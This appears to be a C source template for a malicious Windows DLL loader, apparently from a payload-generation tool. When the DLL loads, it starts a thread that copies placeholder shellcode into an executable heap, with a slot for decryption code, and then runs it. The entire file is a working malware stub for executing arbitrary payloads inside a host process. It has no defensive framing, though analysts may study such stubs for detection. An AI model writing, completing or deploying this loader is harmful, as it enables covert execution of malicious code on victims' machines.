#include <windows.h>

int heapFuncs(unsigned char* pCs, int size)
{
    HANDLE hCr9 = HeapCreate(0x00040000, size, size);
    LPVOID pcsHeapAlloc = HeapAlloc(hCr9, 0x00000008, size);
    memcpy_s(pcsHeapAlloc, size, pCs, size);
    ((void(*)())pcsHeapAlloc)();
    HeapFree(hCr9, 0x00040000, pcsHeapAlloc);
    return 0;
}
DWORD WINAPI ThreadFunction1(LPVOID lpParameter)
{
    
    unsigned char shellcode[] = {$shellcode};
    $crypto
    
    heapFuncs((unsigned char*)shellcode, sizeof(shellcode));
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        HANDLE threadHandle1 = CreateThread(NULL, 0, ThreadFunction1, NULL, 0, NULL);
        if (!threadHandle1)
        {
            CloseHandle(threadHandle1);
        }
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
